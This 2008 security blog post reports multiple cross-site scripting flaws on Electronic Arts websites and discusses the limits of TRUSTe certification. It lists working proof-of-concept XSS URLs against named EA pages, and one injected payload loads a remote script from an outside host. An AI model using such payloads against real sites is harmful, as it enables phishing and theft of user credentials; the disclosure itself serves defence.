Multiple Cross-Site Scripting Vulnerabilities On EA Websites

June 2nd, 2008

Multiple Cross-Site Scripting Vulnerabilities on EA Websites

Multiple cross-site scripting (XSS) vulnerabilities threaten Electronic Arts (EA) gamers due to a flaw on EA main website and numerous sub domains which inlcude profile and customer support areas. Malicious users might initiate series of phishing attacks, spam fake links and use these flaws to steal sensitive personal data such as authentication and payment credentials, game account passwords and also infect PCs with malware.

Although EA’s is a TRUSTe (truste.org) certified customer, there are old unfixed flaws that were reported long ago. TRUSTe is an independent website privacy monitor and it’s seal supposed to assure EA users of safety and security of their personal data.

Vulnerable EA websites include:

ea.com: http://www.ea.com/official/godfather/godfather/us
/scripts/sound_js.inc?page=”><script>alert(‘XSS’)</script>

ea.com #2: http://www.ea.com/prostreet/home.jsp?locale=
us%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

customersupport.ea.com: http://customersupport.ea.com/loginapp/login.do?
curl=”><script>alert(/xss/)</script>

profile.ea.com: https://profile.ea.com/login.do?
surl=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3Cp

findgames.ea.com: http://findgames.ea.com/?
search=%22%3E%3Ciframe%20src=http://xssed.com%3E

thesims2.ea.com: http://thesims2.ea.com/exchange/
object_detail.php?hideFramework=%22%3E%3Cscript
%3Ealert(%22The%20Milk%20Man%22)%3C/script%3E
%3CMARQUEE%3E%3Cimg%20src=http://somesite.com/
somepic.jpg%3E%3C/marquee%3E

profile.ea.com: POST action=
linkcontinue&[email protected]&password=XSS&
cpassword=XSS&month=02&day=03&year=1990&country=BD&
language=0&globaloptin=&thirdpartyoptin=&HIDE_GUS=&
account=0&migrateusername=%5BLjava.lang. String%3B%
40676af&migratepassword=%5BLjava.lang.String
%3B%405a0e76&account=xbox&migrateusername=
%22% 2F%3E&migratepassword=&account=xbox&
migrateusername=%3C%2Fli%3E%3Ciframe+
src%3Dhttp%3A%2F%2Fgoogle.c om%3E%3C%2Fiframe%3E%3C
script+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
%3F%2F%3E&migratepassword=&acc ount=
0&migrateusername=&migratepassword=&account=0&
migrateusername=&migratepassword=

Based on reports from XSSed. Credit for the discovery and report of these vulnerabilities to XSSed: Shocker<-at->ShockingSoft.com, C1c4Tr1Z, mox, koolkeith12345, The Milk Man, x2Fusion, Arham Muhammad and Harry Sintonen.

Clarification (June 10): TRUSTe ensures certified privacy rather than protection against hacking or XSS. Consumers are able to rely on the TRUSTe certification and TRUSTe dispute resolution for any privacy issues they are having on websites that bear the TRUSTe seal. Security vulnerabilities fall outside the scope of what TRUSTe monitors.

Share this item with others:

More on CyberInsecure:

Apple Patches Multiple Vulnerabilities In Safari 3.1.1

Vulnerabilities In Both Principal London Mayoral Election Candidates Websites

Drupal Multiple XSS and Request Forgery Vulnerabilities

Hacked Obama Site Redirects Visitors to Clinton’s Site

Cross-site Scripting Vulnerability On Yahoo’s HotJobs Site Exposes Yahoo Accounts

Posted in Vulnerabilities, XSS |

Print This Post

This entry was posted on Monday, June 2nd, 2008 at 9:01 pm and is filed under Vulnerabilities, XSS. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.